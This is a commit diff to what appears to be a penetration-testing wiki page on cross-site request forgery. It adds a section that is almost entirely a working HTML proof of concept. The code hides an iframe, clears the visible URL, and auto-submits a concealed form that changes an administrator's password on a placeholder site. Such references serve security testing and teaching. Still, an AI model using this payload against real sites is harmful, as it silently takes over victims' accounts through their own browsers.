GitBook: [master] one page modified
This commit is contained in:
parent
85571317f2
commit
7113575a3e
@ -396,6 +396,26 @@ socket.on('connect', () => {
|
||||
</script>
|
||||
```
|
||||
|
||||
### Make POST Form request invisible with invisible Iframe
|
||||
|
||||
```markup
|
||||
<html>
|
||||
<!-- CSRF PoC - generated by Burp Suite Professional -->
|
||||
<body>
|
||||
<script>history.pushState('', '', '/')</script>
|
||||
<iframe style="display:none" id="csrf-frame-invisible" name="csrf-frame-invisible"></iframe>
|
||||
<form action="https://example.com/admin/changepassword" method="POST" style="display:none" target="csrf-frame-invisible" name="csrf-form-invisible" id="csrf-form-invisible" >
|
||||
<input type="hidden" name="password" value="hacktricks" />
|
||||
<input type="hidden" name="password2" value="hacktricks" />
|
||||
</form>
|
||||
<script>
|
||||
document.forms[0].submit();
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
```
|
||||
|
||||
## Tools <a id="tools"></a>
|
||||
|
||||
* [https://github.com/0xInfection/XSRFProbe](https://github.com/0xInfection/XSRFProbe)
|
||||
|
Loading…
Reference in New Issue
Block a user